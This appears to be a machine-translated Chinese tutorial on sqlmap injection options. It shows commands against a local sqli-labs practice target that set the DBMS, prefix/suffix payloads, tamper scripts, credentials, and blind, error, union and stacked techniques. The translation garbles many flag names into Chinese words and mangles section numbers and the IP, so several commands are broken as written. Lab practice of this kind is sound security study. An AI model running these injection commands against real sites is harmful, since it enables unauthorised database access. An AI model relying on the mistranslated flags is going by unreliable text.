本文将详细说明如何分析sqlmap的注入参数。这篇文章的内容质量很高,所以边肖会分享给大家参考。希望你看完这篇文章后有所了解。
首先,指定数据库类型- dbms
http://192 . 168 . 1 . 121/sqli/Less-1/?id=1name=2 – dbms mysql – dbs
其次,指定操作系统
http://192 . 168 . 1 . 121/sqli/Less-1/?id=1name=2 – os windows – dbs
第三,解决编码问题
将所有结果转换为字符串,并用空格替换空结果。
第四,关闭串逸机制。
-不-逃跑
动词(verb的缩写)设置无效的值替换
-无效-bignum大整数替换
-无效-逻辑布尔运算替换
-无效字符串-随机字符串替换
不及物动词自定义进样位置
-前缀设置前缀
-后缀集后缀
sqlmap-u ‘ http://192 . 168 . 1 . 121/sqli/Less-1/?id=1′ -前缀=”)’ -后缀=’和'(abc’=’abc’ – dbs
payload:id=(‘1 ‘)和(‘ abc’=’abc ‘)
七.设置篡改脚本
sqlmap-u ‘ http://192 . 168 . 1 . 121/sqli/Less-1/?id=1′ -最少篡改. py,清漆. py’ – dbs
八.设置dbms身份验证
sqlmap-u ‘ http://192 . 168 . 1 . 121/sqli/Less-1/?id=1 ‘-DBMS-cred=’ root : root ‘-DBS
九.设置特定的sql注入技术
B技术布尔盲
技术误差注入
-U技术联合查询注入
-技术堆栈注入
时间盲测试技术
-Q技术内联查询注入
sqlmap-u ‘ http://192 . 168 . 1 . 121/sqli/Less-1/?id=1’ -技术测试时间-秒-3-DBS
-时间-秒时间盲测时间是3。
X.指定联合字段的数量
sqlmap-u ‘ http://192 . 168 . 1 . 121/sqli/Less-1/?id=1’ – union-cols 12-18 – dbs
十一、指定并集字符,默认为空。
sqlmap-u ‘ http://192 . 168 . 1 . 121/sqli/Less-1/?id=1’ – union-char aaa – dbs
如何解析sqlmap注入参数,希望在这里分享。
内容来源网络,如有侵权,联系删除,本文地址:https://www.230890.com/zhan/140994.html